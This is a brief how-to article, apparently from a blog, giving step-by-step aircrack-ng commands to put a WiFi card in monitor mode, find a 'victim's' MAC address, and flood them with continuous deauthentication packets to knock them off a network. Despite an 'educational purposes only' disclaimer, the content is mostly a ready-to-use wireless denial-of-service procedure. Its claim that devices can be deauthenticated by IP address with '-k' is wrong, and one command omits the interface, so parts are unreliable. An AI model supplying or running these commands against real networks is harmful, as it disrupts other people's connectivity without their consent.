Today, I'll demonstrate to you how you can remove someone from your network. This article is for educational purposes only.I will separate this tutorial into steps, so it's simple to understand.Let's start... STEP 1: Put our WiFi card in monitoring mode:
- Open terminal
- Type: airmon-ng start wlan0
- That's it!
Now, our card is in monitoring mode. STEP 2: Finding our BSSID and finding our victim's MAC address:
- Open a new terminal
- Type: airodump-ng wlan0
- Airodump-ng wlan0 will display all routers that are near you and you need to find your router BSSID.
- When you find your BSSID, in a new terminal, you need to type: airodump-ng --bssid (your bssid)
- Airodump-ng --bssid (your bssid) will display your victim's MAC addresses so you can remove them.
After you found your victim's MAC address, follow the next step. STEP 3: Remove the user from your network:There are 2 ways to remove a user from your network with aireplay-ng: by their IP address or by their MAC address.
- Remove a user using their MAC address:aireplay-ng --deauth 0 -a ( your router bssid) -c (their mac address)
- Remove a user with their IP address:aireplay-ng --deauth 0 -a (your router bssid) -k (their ip address)
So that's it. I hope you'll find this article helpful and that it won't be used to do any harm.